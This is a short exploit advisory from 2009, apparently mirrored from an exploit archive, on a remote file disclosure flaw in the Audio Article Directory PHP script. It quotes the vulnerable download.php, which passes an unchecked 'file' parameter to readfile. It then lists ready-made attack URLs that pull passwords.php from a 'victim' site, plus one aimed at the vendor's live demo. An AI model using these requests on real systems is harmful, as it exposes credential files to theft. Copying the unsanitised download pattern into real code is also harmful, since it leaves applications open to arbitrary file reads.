[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Audio Article Directory (file) Remote File Disclosure Vulnerability
# Published : 2009-06-29
# Author : ThE g0bL!N
# Previous Title : Joomla com_bookflip (book_id) Remote SQL Injection Vulnerability
# Next Title : Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit
#################################################################################################################
[+] Audio Article Directory Remote File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
Vendor:http://audioarticledirectory.com
#################################################################################################################
Poc
---
Download.php
<?
$file = "./".$_GET['file']; => one
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header("Content-Disposition: attachment; filename="".basename($file)."";");
header('Content-Length: ' . filesize($file));
@readfile($file) OR die(); => 2
?>
Exploit
----
http://victim/download.php?file=download.php
http://victim/download.php?file=./passwords.php
Demo
----
http://audioarticledirectory.com/demo/download.php?file=./passwords.php
################################################################################################################
# www.Syue.com [2009-06-29]